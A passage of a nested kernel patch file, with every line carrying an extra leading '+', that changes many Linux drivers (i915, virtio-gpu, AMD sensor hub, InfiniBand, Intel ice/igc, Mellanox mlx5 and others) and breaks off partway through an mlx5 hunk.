+index f461e34cc5f07..0a123bb44c9fb 100644
+--- a/drivers/gpu/drm/i915/gem/i915_gem_execbuffer.c
++++ b/drivers/gpu/drm/i915/gem/i915_gem_execbuffer.c
+@@ -3478,6 +3478,13 @@ err_request:
+ 				   eb.composite_fence :
+ 				   &eb.requests[0]->fence);
+ 
++	if (unlikely(eb.gem_context->syncobj)) {
++		drm_syncobj_replace_fence(eb.gem_context->syncobj,
++					  eb.composite_fence ?
++					  eb.composite_fence :
++					  &eb.requests[0]->fence);
++	}
++
+ 	if (out_fence) {
+ 		if (err == 0) {
+ 			fd_install(out_fence_fd, out_fence->file);
+@@ -3489,13 +3496,6 @@ err_request:
+ 		}
+ 	}
+ 
+-	if (unlikely(eb.gem_context->syncobj)) {
+-		drm_syncobj_replace_fence(eb.gem_context->syncobj,
+-					  eb.composite_fence ?
+-					  eb.composite_fence :
+-					  &eb.requests[0]->fence);
+-	}
+-
+ 	if (!out_fence && eb.composite_fence)
+ 		dma_fence_put(eb.composite_fence);
+ 
+diff --git a/drivers/gpu/drm/i915/gem/i915_gem_shmem.c b/drivers/gpu/drm/i915/gem/i915_gem_shmem.c
+index 2f7804492cd5c..b7eae3aee1660 100644
+--- a/drivers/gpu/drm/i915/gem/i915_gem_shmem.c
++++ b/drivers/gpu/drm/i915/gem/i915_gem_shmem.c
+@@ -579,7 +579,7 @@ static int shmem_object_init(struct intel_memory_region *mem,
+ 	mapping_set_gfp_mask(mapping, mask);
+ 	GEM_BUG_ON(!(mapping_gfp_mask(mapping) & __GFP_RECLAIM));
+ 
+-	i915_gem_object_init(obj, &i915_gem_shmem_ops, &lock_class, 0);
++	i915_gem_object_init(obj, &i915_gem_shmem_ops, &lock_class, flags);
+ 	obj->mem_flags |= I915_BO_FLAG_STRUCT_PAGE;
+ 	obj->write_domain = I915_GEM_DOMAIN_CPU;
+ 	obj->read_domains = I915_GEM_DOMAIN_CPU;
+diff --git a/drivers/gpu/drm/virtio/virtgpu_ioctl.c b/drivers/gpu/drm/virtio/virtgpu_ioctl.c
+index 9f4a90493aeac..da45215a933d0 100644
+--- a/drivers/gpu/drm/virtio/virtgpu_ioctl.c
++++ b/drivers/gpu/drm/virtio/virtgpu_ioctl.c
+@@ -126,7 +126,6 @@ static int virtio_gpu_execbuffer_ioctl(struct drm_device *dev, void *data,
+ 	void __user *user_bo_handles = NULL;
+ 	struct virtio_gpu_object_array *buflist = NULL;
+ 	struct sync_file *sync_file;
+-	int in_fence_fd = exbuf->fence_fd;
+ 	int out_fence_fd = -1;
+ 	void *buf;
+ 	uint64_t fence_ctx;
+@@ -152,13 +151,11 @@ static int virtio_gpu_execbuffer_ioctl(struct drm_device *dev, void *data,
+ 		ring_idx = exbuf->ring_idx;
+ 	}
+ 
+-	exbuf->fence_fd = -1;
+-
+ 	virtio_gpu_create_context(dev, file);
+ 	if (exbuf->flags & VIRTGPU_EXECBUF_FENCE_FD_IN) {
+ 		struct dma_fence *in_fence;
+ 
+-		in_fence = sync_file_get_fence(in_fence_fd);
++		in_fence = sync_file_get_fence(exbuf->fence_fd);
+ 
+ 		if (!in_fence)
+ 			return -EINVAL;
+diff --git a/drivers/hid/amd-sfh-hid/amd_sfh_client.c b/drivers/hid/amd-sfh-hid/amd_sfh_client.c
+index 1fb0f7105fb21..c751d12f5df89 100644
+--- a/drivers/hid/amd-sfh-hid/amd_sfh_client.c
++++ b/drivers/hid/amd-sfh-hid/amd_sfh_client.c
+@@ -227,6 +227,7 @@ int amd_sfh_hid_client_init(struct amd_mp2_dev *privdata)
+ 	cl_data->num_hid_devices = amd_mp2_get_sensor_num(privdata, &cl_data->sensor_idx[0]);
+ 	if (cl_data->num_hid_devices == 0)
+ 		return -ENODEV;
++	cl_data->is_any_sensor_enabled = false;
+ 
+ 	INIT_DELAYED_WORK(&cl_data->work, amd_sfh_work);
+ 	INIT_DELAYED_WORK(&cl_data->work_buffer, amd_sfh_work_buffer);
+@@ -287,6 +288,7 @@ int amd_sfh_hid_client_init(struct amd_mp2_dev *privdata)
+ 		status = amd_sfh_wait_for_response
+ 				(privdata, cl_data->sensor_idx[i], SENSOR_ENABLED);
+ 		if (status == SENSOR_ENABLED) {
++			cl_data->is_any_sensor_enabled = true;
+ 			cl_data->sensor_sts[i] = SENSOR_ENABLED;
+ 			rc = amdtp_hid_probe(cl_data->cur_hid_dev, cl_data);
+ 			if (rc) {
+@@ -301,19 +303,26 @@ int amd_sfh_hid_client_init(struct amd_mp2_dev *privdata)
+ 					cl_data->sensor_sts[i]);
+ 				goto cleanup;
+ 			}
++		} else {
++			cl_data->sensor_sts[i] = SENSOR_DISABLED;
++			dev_dbg(dev, "sid 0x%x (%s) status 0x%x\n",
++				cl_data->sensor_idx[i],
++				get_sensor_name(cl_data->sensor_idx[i]),
++				cl_data->sensor_sts[i]);
+ 		}
+ 		dev_dbg(dev, "sid 0x%x (%s) status 0x%x\n",
+ 			cl_data->sensor_idx[i], get_sensor_name(cl_data->sensor_idx[i]),
+ 			cl_data->sensor_sts[i]);
+ 	}
+-	if (mp2_ops->discovery_status && mp2_ops->discovery_status(privdata) == 0) {
++	if (!cl_data->is_any_sensor_enabled ||
++	   (mp2_ops->discovery_status && mp2_ops->discovery_status(privdata) == 0)) {
+ 		amd_sfh_hid_client_deinit(privdata);
+ 		for (i = 0; i < cl_data->num_hid_devices; i++) {
+ 			devm_kfree(dev, cl_data->feature_report[i]);
+ 			devm_kfree(dev, in_data->input_report[i]);
+ 			devm_kfree(dev, cl_data->report_descr[i]);
+ 		}
+-		dev_warn(dev, "Failed to discover, sensors not enabled\n");
++		dev_warn(dev, "Failed to discover, sensors not enabled is %d\n", cl_data->is_any_sensor_enabled);
+ 		return -EOPNOTSUPP;
+ 	}
+ 	schedule_delayed_work(&cl_data->work_buffer, msecs_to_jiffies(AMD_SFH_IDLE_LOOP));
+diff --git a/drivers/hid/amd-sfh-hid/amd_sfh_hid.h b/drivers/hid/amd-sfh-hid/amd_sfh_hid.h
+index 3754fb423e3ae..528036892c9d2 100644
+--- a/drivers/hid/amd-sfh-hid/amd_sfh_hid.h
++++ b/drivers/hid/amd-sfh-hid/amd_sfh_hid.h
+@@ -32,6 +32,7 @@ struct amd_input_data {
+ struct amdtp_cl_data {
+ 	u8 init_done;
+ 	u32 cur_hid_dev;
++	bool is_any_sensor_enabled;
+ 	u32 hid_dev_count;
+ 	u32 num_hid_devices;
+ 	struct device_info *hid_devices;
+diff --git a/drivers/hid/hid-logitech-hidpp.c b/drivers/hid/hid-logitech-hidpp.c
+index 656757c79f6b8..07b8506eecc41 100644
+--- a/drivers/hid/hid-logitech-hidpp.c
++++ b/drivers/hid/hid-logitech-hidpp.c
+@@ -3978,7 +3978,8 @@ static void hidpp_connect_event(struct hidpp_device *hidpp)
+ 	}
+ 
+ 	hidpp_initialize_battery(hidpp);
+-	hidpp_initialize_hires_scroll(hidpp);
++	if (!hid_is_usb(hidpp->hid_dev))
++		hidpp_initialize_hires_scroll(hidpp);
+ 
+ 	/* forward current battery state */
+ 	if (hidpp->capabilities & HIDPP_CAPABILITY_HIDPP10_BATTERY) {
+diff --git a/drivers/infiniband/hw/hfi1/file_ops.c b/drivers/infiniband/hw/hfi1/file_ops.c
+index f5f9269fdc162..7c5d487ec9168 100644
+--- a/drivers/infiniband/hw/hfi1/file_ops.c
++++ b/drivers/infiniband/hw/hfi1/file_ops.c
+@@ -1318,12 +1318,15 @@ static int user_exp_rcv_setup(struct hfi1_filedata *fd, unsigned long arg,
+ 		addr = arg + offsetof(struct hfi1_tid_info, tidcnt);
+ 		if (copy_to_user((void __user *)addr, &tinfo.tidcnt,
+ 				 sizeof(tinfo.tidcnt)))
+-			return -EFAULT;
++			ret = -EFAULT;
+ 
+ 		addr = arg + offsetof(struct hfi1_tid_info, length);
+-		if (copy_to_user((void __user *)addr, &tinfo.length,
++		if (!ret && copy_to_user((void __user *)addr, &tinfo.length,
+ 				 sizeof(tinfo.length)))
+ 			ret = -EFAULT;
++
++		if (ret)
++			hfi1_user_exp_rcv_invalid(fd, &tinfo);
+ 	}
+ 
+ 	return ret;
+diff --git a/drivers/infiniband/hw/irdma/cm.c b/drivers/infiniband/hw/irdma/cm.c
+index 7b086fe63a245..195aa9ea18b6c 100644
+--- a/drivers/infiniband/hw/irdma/cm.c
++++ b/drivers/infiniband/hw/irdma/cm.c
+@@ -1722,6 +1722,9 @@ static int irdma_add_mqh_4(struct irdma_device *iwdev,
+ 			continue;
+ 
+ 		idev = in_dev_get(ip_dev);
++		if (!idev)
++			continue;
++
+ 		in_dev_for_each_ifa_rtnl(ifa, idev) {
+ 			ibdev_dbg(&iwdev->ibdev,
+ 				  "CM: Allocating child CM Listener forIP=%pI4, vlan_id=%d, MAC=%pM\n",
+diff --git a/drivers/infiniband/hw/usnic/usnic_uiom.c b/drivers/infiniband/hw/usnic/usnic_uiom.c
+index 67923ced6e2d1..b343f6f1bda57 100644
+--- a/drivers/infiniband/hw/usnic/usnic_uiom.c
++++ b/drivers/infiniband/hw/usnic/usnic_uiom.c
+@@ -277,8 +277,8 @@ iter_chunk:
+ 				size = pa_end - pa_start + PAGE_SIZE;
+ 				usnic_dbg("va 0x%lx pa %pa size 0x%zx flags 0x%x",
+ 					va_start, &pa_start, size, flags);
+-				err = iommu_map(pd->domain, va_start, pa_start,
+-							size, flags);
++				err = iommu_map_atomic(pd->domain, va_start,
++						       pa_start, size, flags);
+ 				if (err) {
+ 					usnic_err("Failed to map va 0x%lx pa %pa size 0x%zx with err %d\n",
+ 						va_start, &pa_start, size, err);
+@@ -294,8 +294,8 @@ iter_chunk:
+ 				size = pa - pa_start + PAGE_SIZE;
+ 				usnic_dbg("va 0x%lx pa %pa size 0x%zx flags 0x%x\n",
+ 					va_start, &pa_start, size, flags);
+-				err = iommu_map(pd->domain, va_start, pa_start,
+-						size, flags);
++				err = iommu_map_atomic(pd->domain, va_start,
++						       pa_start, size, flags);
+ 				if (err) {
+ 					usnic_err("Failed to map va 0x%lx pa %pa size 0x%zx with err %d\n",
+ 						va_start, &pa_start, size, err);
+diff --git a/drivers/infiniband/ulp/ipoib/ipoib_main.c b/drivers/infiniband/ulp/ipoib/ipoib_main.c
+index ac25fc80fb337..f10d4bcf87d27 100644
+--- a/drivers/infiniband/ulp/ipoib/ipoib_main.c
++++ b/drivers/infiniband/ulp/ipoib/ipoib_main.c
+@@ -2200,6 +2200,14 @@ int ipoib_intf_init(struct ib_device *hca, u32 port, const char *name,
+ 		rn->attach_mcast = ipoib_mcast_attach;
+ 		rn->detach_mcast = ipoib_mcast_detach;
+ 		rn->hca = hca;
++
++		rc = netif_set_real_num_tx_queues(dev, 1);
++		if (rc)
++			goto out;
++
++		rc = netif_set_real_num_rx_queues(dev, 1);
++		if (rc)
++			goto out;
+ 	}
+ 
+ 	priv->rn_ops = dev->netdev_ops;
+diff --git a/drivers/net/bonding/bond_debugfs.c b/drivers/net/bonding/bond_debugfs.c
+index 4f9b4a18c74cd..5940945266489 100644
+--- a/drivers/net/bonding/bond_debugfs.c
++++ b/drivers/net/bonding/bond_debugfs.c
+@@ -76,7 +76,7 @@ void bond_debug_reregister(struct bonding *bond)
+ 
+ 	d = debugfs_rename(bonding_debug_root, bond->debug_dir,
+ 			   bonding_debug_root, bond->dev->name);
+-	if (d) {
++	if (!IS_ERR(d)) {
+ 		bond->debug_dir = d;
+ 	} else {
+ 		netdev_warn(bond->dev, "failed to reregister, so just unregister old one\n");
+diff --git a/drivers/net/dsa/mt7530.c b/drivers/net/dsa/mt7530.c
+index e74c6b4061728..a884f6f6a8c2c 100644
+--- a/drivers/net/dsa/mt7530.c
++++ b/drivers/net/dsa/mt7530.c
+@@ -1309,14 +1309,26 @@ mt7530_port_set_vlan_aware(struct dsa_switch *ds, int port)
+ 		if (!priv->ports[port].pvid)
+ 			mt7530_rmw(priv, MT7530_PVC_P(port), ACC_FRM_MASK,
+ 				   MT7530_VLAN_ACC_TAGGED);
+-	}
+ 
+-	/* Set the port as a user port which is to be able to recognize VID
+-	 * from incoming packets before fetching entry within the VLAN table.
+-	 */
+-	mt7530_rmw(priv, MT7530_PVC_P(port), VLAN_ATTR_MASK | PVC_EG_TAG_MASK,
+-		   VLAN_ATTR(MT7530_VLAN_USER) |
+-		   PVC_EG_TAG(MT7530_VLAN_EG_DISABLED));
++		/* Set the port as a user port which is to be able to recognize
++		 * VID from incoming packets before fetching entry within the
++		 * VLAN table.
++		 */
++		mt7530_rmw(priv, MT7530_PVC_P(port),
++			   VLAN_ATTR_MASK | PVC_EG_TAG_MASK,
++			   VLAN_ATTR(MT7530_VLAN_USER) |
++			   PVC_EG_TAG(MT7530_VLAN_EG_DISABLED));
++	} else {
++		/* Also set CPU ports to the "user" VLAN port attribute, to
++		 * allow VLAN classification, but keep the EG_TAG attribute as
++		 * "consistent" (i.o.w. don't change its value) for packets
++		 * received by the switch from the CPU, so that tagged packets
++		 * are forwarded to user ports as tagged, and untagged as
++		 * untagged.
++		 */
++		mt7530_rmw(priv, MT7530_PVC_P(port), VLAN_ATTR_MASK,
++			   VLAN_ATTR(MT7530_VLAN_USER));
++	}
+ }
+ 
+ static void
+diff --git a/drivers/net/ethernet/cadence/macb_main.c b/drivers/net/ethernet/cadence/macb_main.c
+index 300f47ca42e3e..e255780f3867c 100644
+--- a/drivers/net/ethernet/cadence/macb_main.c
++++ b/drivers/net/ethernet/cadence/macb_main.c
+@@ -4614,25 +4614,26 @@ static int init_reset_optional(struct platform_device *pdev)
+ 		if (ret)
+ 			return dev_err_probe(&pdev->dev, ret,
+ 					     "failed to init SGMII PHY\n");
+-	}
+ 
+-	ret = zynqmp_pm_is_function_supported(PM_IOCTL, IOCTL_SET_GEM_CONFIG);
+-	if (!ret) {
+-		u32 pm_info[2];
++		ret = zynqmp_pm_is_function_supported(PM_IOCTL, IOCTL_SET_GEM_CONFIG);
++		if (!ret) {
++			u32 pm_info[2];
++
++			ret = of_property_read_u32_array(pdev->dev.of_node, "power-domains",
++							 pm_info, ARRAY_SIZE(pm_info));
++			if (ret) {
++				dev_err(&pdev->dev, "Failed to read power management information\n");
++				goto err_out_phy_exit;
++			}
++			ret = zynqmp_pm_set_gem_config(pm_info[1], GEM_CONFIG_FIXED, 0);
++			if (ret)
++				goto err_out_phy_exit;
+ 
+-		ret = of_property_read_u32_array(pdev->dev.of_node, "power-domains",
+-						 pm_info, ARRAY_SIZE(pm_info));
+-		if (ret) {
+-			dev_err(&pdev->dev, "Failed to read power management information\n");
+-			goto err_out_phy_exit;
++			ret = zynqmp_pm_set_gem_config(pm_info[1], GEM_CONFIG_SGMII_MODE, 1);
++			if (ret)
++				goto err_out_phy_exit;
+ 		}
+-		ret = zynqmp_pm_set_gem_config(pm_info[1], GEM_CONFIG_FIXED, 0);
+-		if (ret)
+-			goto err_out_phy_exit;
+ 
+-		ret = zynqmp_pm_set_gem_config(pm_info[1], GEM_CONFIG_SGMII_MODE, 1);
+-		if (ret)
+-			goto err_out_phy_exit;
+ 	}
+ 
+ 	/* Fully reset controller at hardware level if mapped in device tree */
+diff --git a/drivers/net/ethernet/intel/ice/ice_main.c b/drivers/net/ethernet/intel/ice/ice_main.c
+index 1ac5f0018c7eb..333582dabba16 100644
+--- a/drivers/net/ethernet/intel/ice/ice_main.c
++++ b/drivers/net/ethernet/intel/ice/ice_main.c
+@@ -5518,7 +5518,7 @@ static int __init ice_module_init(void)
+ 	pr_info("%s\n", ice_driver_string);
+ 	pr_info("%s\n", ice_copyright);
+ 
+-	ice_wq = alloc_workqueue("%s", WQ_MEM_RECLAIM, 0, KBUILD_MODNAME);
++	ice_wq = alloc_workqueue("%s", 0, 0, KBUILD_MODNAME);
+ 	if (!ice_wq) {
+ 		pr_err("Failed to create workqueue\n");
+ 		return -ENOMEM;
+diff --git a/drivers/net/ethernet/intel/ice/ice_switch.c b/drivers/net/ethernet/intel/ice/ice_switch.c
+index 9b762f7972ce5..61f844d225123 100644
+--- a/drivers/net/ethernet/intel/ice/ice_switch.c
++++ b/drivers/net/ethernet/intel/ice/ice_switch.c
+@@ -5420,7 +5420,7 @@ ice_add_adv_recipe(struct ice_hw *hw, struct ice_adv_lkup_elem *lkups,
+ 	 */
+ 	status = ice_add_special_words(rinfo, lkup_exts, ice_is_dvm_ena(hw));
+ 	if (status)
+-		goto err_free_lkup_exts;
++		goto err_unroll;
+ 
+ 	/* Group match words into recipes using preferred recipe grouping
+ 	 * criteria.
+diff --git a/drivers/net/ethernet/intel/ice/ice_vf_vsi_vlan_ops.c b/drivers/net/ethernet/intel/ice/ice_vf_vsi_vlan_ops.c
+index 5ecc0ee9a78e0..b1ffb81893d48 100644
+--- a/drivers/net/ethernet/intel/ice/ice_vf_vsi_vlan_ops.c
++++ b/drivers/net/ethernet/intel/ice/ice_vf_vsi_vlan_ops.c
+@@ -44,13 +44,17 @@ void ice_vf_vsi_init_vlan_ops(struct ice_vsi *vsi)
+ 
+ 		/* outer VLAN ops regardless of port VLAN config */
+ 		vlan_ops->add_vlan = ice_vsi_add_vlan;
+-		vlan_ops->dis_rx_filtering = ice_vsi_dis_rx_vlan_filtering;
+ 		vlan_ops->ena_tx_filtering = ice_vsi_ena_tx_vlan_filtering;
+ 		vlan_ops->dis_tx_filtering = ice_vsi_dis_tx_vlan_filtering;
+ 
+ 		if (ice_vf_is_port_vlan_ena(vf)) {
+ 			/* setup outer VLAN ops */
+ 			vlan_ops->set_port_vlan = ice_vsi_set_outer_port_vlan;
++			/* all Rx traffic should be in the domain of the
++			 * assigned port VLAN, so prevent disabling Rx VLAN
++			 * filtering
++			 */
++			vlan_ops->dis_rx_filtering = noop_vlan;
+ 			vlan_ops->ena_rx_filtering =
+ 				ice_vsi_ena_rx_vlan_filtering;
+ 
+@@ -63,6 +67,9 @@ void ice_vf_vsi_init_vlan_ops(struct ice_vsi *vsi)
+ 			vlan_ops->ena_insertion = ice_vsi_ena_inner_insertion;
+ 			vlan_ops->dis_insertion = ice_vsi_dis_inner_insertion;
+ 		} else {
++			vlan_ops->dis_rx_filtering =
++				ice_vsi_dis_rx_vlan_filtering;
++
+ 			if (!test_bit(ICE_FLAG_VF_VLAN_PRUNING, pf->flags))
+ 				vlan_ops->ena_rx_filtering = noop_vlan;
+ 			else
+@@ -96,7 +103,14 @@ void ice_vf_vsi_init_vlan_ops(struct ice_vsi *vsi)
+ 			vlan_ops->set_port_vlan = ice_vsi_set_inner_port_vlan;
+ 			vlan_ops->ena_rx_filtering =
+ 				ice_vsi_ena_rx_vlan_filtering;
++			/* all Rx traffic should be in the domain of the
++			 * assigned port VLAN, so prevent disabling Rx VLAN
++			 * filtering
++			 */
++			vlan_ops->dis_rx_filtering = noop_vlan;
+ 		} else {
++			vlan_ops->dis_rx_filtering =
++				ice_vsi_dis_rx_vlan_filtering;
+ 			if (!test_bit(ICE_FLAG_VF_VLAN_PRUNING, pf->flags))
+ 				vlan_ops->ena_rx_filtering = noop_vlan;
+ 			else
+diff --git a/drivers/net/ethernet/intel/igc/igc_main.c b/drivers/net/ethernet/intel/igc/igc_main.c
+index 34db1c006b20a..3b5b36206c44b 100644
+--- a/drivers/net/ethernet/intel/igc/igc_main.c
++++ b/drivers/net/ethernet/intel/igc/igc_main.c
+@@ -2942,7 +2942,9 @@ static bool igc_clean_tx_irq(struct igc_q_vector *q_vector, int napi_budget)
+ 		if (tx_buffer->next_to_watch &&
+ 		    time_after(jiffies, tx_buffer->time_stamp +
+ 		    (adapter->tx_timeout_factor * HZ)) &&
+-		    !(rd32(IGC_STATUS) & IGC_STATUS_TXOFF)) {
++		    !(rd32(IGC_STATUS) & IGC_STATUS_TXOFF) &&
++		    (rd32(IGC_TDH(tx_ring->reg_idx)) !=
++		     readl(tx_ring->tail))) {
+ 			/* detected Tx unit hang */
+ 			netdev_err(tx_ring->netdev,
+ 				   "Detected Tx Unit Hang\n"
+@@ -5068,6 +5070,24 @@ static int igc_change_mtu(struct net_device *netdev, int new_mtu)
+ 	return 0;
+ }
+ 
++/**
++ * igc_tx_timeout - Respond to a Tx Hang
++ * @netdev: network interface device structure
++ * @txqueue: queue number that timed out
++ **/
++static void igc_tx_timeout(struct net_device *netdev,
++			   unsigned int __always_unused txqueue)
++{
++	struct igc_adapter *adapter = netdev_priv(netdev);
++	struct igc_hw *hw = &adapter->hw;
++
++	/* Do the reset outside of interrupt context */
++	adapter->tx_timeout_count++;
++	schedule_work(&adapter->reset_task);
++	wr32(IGC_EICS,
++	     (adapter->eims_enable_mask & ~adapter->eims_other));
++}
++
+ /**
+  * igc_get_stats64 - Get System Network Statistics
+  * @netdev: network interface device structure
+@@ -5495,7 +5515,7 @@ static void igc_watchdog_task(struct work_struct *work)
+ 			case SPEED_100:
+ 			case SPEED_1000:
+ 			case SPEED_2500:
+-				adapter->tx_timeout_factor = 7;
++				adapter->tx_timeout_factor = 1;
+ 				break;
+ 			}
+ 
+@@ -6313,6 +6333,7 @@ static const struct net_device_ops igc_netdev_ops = {
+ 	.ndo_set_rx_mode	= igc_set_rx_mode,
+ 	.ndo_set_mac_address	= igc_set_mac,
+ 	.ndo_change_mtu		= igc_change_mtu,
++	.ndo_tx_timeout		= igc_tx_timeout,
+ 	.ndo_get_stats64	= igc_get_stats64,
+ 	.ndo_fix_features	= igc_fix_features,
+ 	.ndo_set_features	= igc_set_features,
+diff --git a/drivers/net/ethernet/mediatek/mtk_eth_soc.c b/drivers/net/ethernet/mediatek/mtk_eth_soc.c
+index 9aa1892a609c7..53ee9dea66388 100644
+--- a/drivers/net/ethernet/mediatek/mtk_eth_soc.c
++++ b/drivers/net/ethernet/mediatek/mtk_eth_soc.c
+@@ -1495,8 +1495,8 @@ static struct page_pool *mtk_create_page_pool(struct mtk_eth *eth,
+ 	if (IS_ERR(pp))
+ 		return pp;
+ 
+-	err = __xdp_rxq_info_reg(xdp_q, &eth->dummy_dev, eth->rx_napi.napi_id,
+-				 id, PAGE_SIZE);
++	err = __xdp_rxq_info_reg(xdp_q, &eth->dummy_dev, id,
++				 eth->rx_napi.napi_id, PAGE_SIZE);
+ 	if (err < 0)
+ 		goto err_free_pp;
+ 
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/debugfs.c b/drivers/net/ethernet/mellanox/mlx5/core/debugfs.c
+index 3e232a65a0c3e..bb95b40d25eb5 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/debugfs.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/debugfs.c
+@@ -245,8 +245,9 @@ void mlx5_pages_debugfs_init(struct mlx5_core_dev *dev)
+ 	pages = dev->priv.dbg.pages_debugfs;
+ 
+ 	debugfs_create_u32("fw_pages_total", 0400, pages, &dev->priv.fw_pages);
+-	debugfs_create_u32("fw_pages_vfs", 0400, pages, &dev->priv.vfs_pages);
+-	debugfs_create_u32("fw_pages_host_pf", 0400, pages, &dev->priv.host_pf_pages);
++	debugfs_create_u32("fw_pages_vfs", 0400, pages, &dev->priv.page_counters[MLX5_VF]);
++	debugfs_create_u32("fw_pages_sfs", 0400, pages, &dev->priv.page_counters[MLX5_SF]);
++	debugfs_create_u32("fw_pages_host_pf", 0400, pages, &dev->priv.page_counters[MLX5_HOST_PF]);
+ 	debugfs_create_u32("fw_pages_alloc_failed", 0400, pages, &dev->priv.fw_pages_alloc_failed);
+ 	debugfs_create_u32("fw_pages_give_dropped", 0400, pages, &dev->priv.give_pages_dropped);
+ 	debugfs_create_u32("fw_pages_reclaim_discard", 0400, pages,
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/diag/fw_tracer.c b/drivers/net/ethernet/mellanox/mlx5/core/diag/fw_tracer.c
+index 21831386b26e8..5b05b884b5fb3 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/diag/fw_tracer.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/diag/fw_tracer.c
+@@ -64,6 +64,7 @@ static int mlx5_query_mtrc_caps(struct mlx5_fw_tracer *tracer)
+ 			MLX5_GET(mtrc_cap, out, num_string_trace);
+ 	tracer->str_db.num_string_db = MLX5_GET(mtrc_cap, out, num_string_db);
+ 	tracer->owner = !!MLX5_GET(mtrc_cap, out, trace_owner);
++	tracer->str_db.loaded = false;
+ 
+ 	for (i = 0; i < tracer->str_db.num_string_db; i++) {
+ 		mtrc_cap_sp = MLX5_ADDR_OF(mtrc_cap, out, string_db_param[i]);
+@@ -756,6 +757,7 @@ static int mlx5_fw_tracer_set_mtrc_conf(struct mlx5_fw_tracer *tracer)
+ 	if (err)
+ 		mlx5_core_warn(dev, "FWTracer: Failed to set tracer configurations %d\n", err);
+ 
++	tracer->buff.consumer_index = 0;
+ 	return err;
+ }
+ 
+@@ -820,7 +822,6 @@ static void mlx5_fw_tracer_ownership_change(struct work_struct *work)
+ 	mlx5_core_dbg(tracer->dev, "FWTracer: ownership changed, current=(%d)\n", tracer->owner);
+ 	if (tracer->owner) {
+ 		tracer->owner = false;
+-		tracer->buff.consumer_index = 0;
+ 		return;
+ 	}
+ 
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/ecpf.c b/drivers/net/ethernet/mellanox/mlx5/core/ecpf.c
+index 464eb3a184506..cdc87ecae5d39 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/ecpf.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/ecpf.c
+@@ -87,7 +87,7 @@ void mlx5_ec_cleanup(struct mlx5_core_dev *dev)
+ 
+ 	mlx5_host_pf_cleanup(dev);
+ 
+-	err = mlx5_wait_for_pages(dev, &dev->priv.host_pf_pages);
++	err = mlx5_wait_for_pages(dev, &dev->priv.page_counters[MLX5_HOST_PF]);
+ 	if (err)
+ 		mlx5_core_warn(dev, "Timeout reclaiming external host PF pages err(%d)\n", err);
+ }
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en/rep/bridge.c b/drivers/net/ethernet/mellanox/mlx5/core/en/rep/bridge.c
+index 8099a21e674c9..ce85b48d327da 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en/rep/bridge.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en/rep/bridge.c
+@@ -438,10 +438,6 @@ static int mlx5_esw_bridge_switchdev_event(struct notifier_block *nb,
+ 
+ 	switch (event) {
+ 	case SWITCHDEV_FDB_ADD_TO_BRIDGE:
+-		/* only handle the event on native eswtich of representor */
+-		if (!mlx5_esw_bridge_is_local(dev, rep, esw))
+-			break;
+-
+ 		fdb_info = container_of(info,
+ 					struct switchdev_notifier_fdb_info,
+ 					info);
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en_fs.c b/drivers/net/ethernet/mellanox/mlx5/core/en_fs.c
+index 1892ccb889b3f..7cd36f4ac3efc 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en_fs.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en_fs.c
+@@ -443,7 +443,7 @@ void mlx5e_enable_cvlan_filter(struct mlx5e_flow_steering *fs, bool promisc)
+ 
+ void mlx5e_disable_cvlan_filter(struct mlx5e_flow_steering *fs, bool promisc)
+ {
+-	if (fs->vlan->cvlan_filter_disabled)
++	if (!fs->vlan || fs->vlan->cvlan_filter_disabled)
+ 		return;
+ 
+ 	fs->vlan->cvlan_filter_disabled = true;
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en_main.c b/drivers/net/ethernet/mellanox/mlx5/core/en_main.c
+index 4dc149ef618c4..142ed2d98cd5d 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en_main.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en_main.c
+@@ -591,7 +591,8 @@ static int mlx5e_init_rxq_rq(struct mlx5e_channel *c, struct mlx5e_params *param
+ 	rq->ix           = c->ix;
+ 	rq->channel      = c;
+ 	rq->mdev         = mdev;
+-	rq->hw_mtu       = MLX5E_SW2HW_MTU(params, params->sw_mtu);
++	rq->hw_mtu =
++		MLX5E_SW2HW_MTU(params, params->sw_mtu) - ETH_FCS_LEN * !params->scatter_fcs_en;
+ 	rq->xdpsq        = &c->rq_xdpsq;
+ 	rq->stats        = &c->priv->channel_stats[c->ix]->rq;
+ 	rq->ptp_cyc2time = mlx5_rq_ts_translator(mdev);
+@@ -1014,35 +1015,6 @@ int mlx5e_flush_rq(struct mlx5e_rq *rq, int curr_state)
+ 	return mlx5e_rq_to_ready(rq, curr_state);
+ }
+ 
+-static int mlx5e_modify_rq_scatter_fcs(struct mlx5e_rq *rq, bool enable)
+-{
+-	struct mlx5_core_dev *mdev = rq->mdev;
+-
+-	void *in;
+-	void *rqc;
+-	int inlen;
+-	int err;
+-
+-	inlen = MLX5_ST_SZ_BYTES(modify_rq_in);
+-	in = kvzalloc(inlen, GFP_KERNEL);
+-	if (!in)
+-		return -ENOMEM;
+-
+-	rqc = MLX5_ADDR_OF(modify_rq_in, in, ctx);
+-
+-	MLX5_SET(modify_rq_in, in, rq_state, MLX5_RQC_STATE_RDY);
+-	MLX5_SET64(modify_rq_in, in, modify_bitmask,
+-		   MLX5_MODIFY_RQ_IN_MODIFY_BITMASK_SCATTER_FCS);
+-	MLX5_SET(rqc, rqc, scatter_fcs, enable);
+-	MLX5_SET(rqc, rqc, state, MLX5_RQC_STATE_RDY);
+-
+-	err = mlx5_core_modify_rq(mdev, rq->rqn, in);
+-
+-	kvfree(in);
+-
+-	return err;
+-}
+-
+ static int mlx5e_modify_rq_vsd(struct mlx5e_rq *rq, bool vsd)
+ {
+ 	struct mlx5_core_dev *mdev = rq->mdev;
+@@ -3301,20 +3273,6 @@ static void mlx5e_cleanup_nic_tx(struct mlx5e_priv *priv)
+ 	mlx5e_destroy_tises(priv);
+ }
+ 
+-static int mlx5e_modify_channels_scatter_fcs(struct mlx5e_channels *chs, bool enable)
+-{
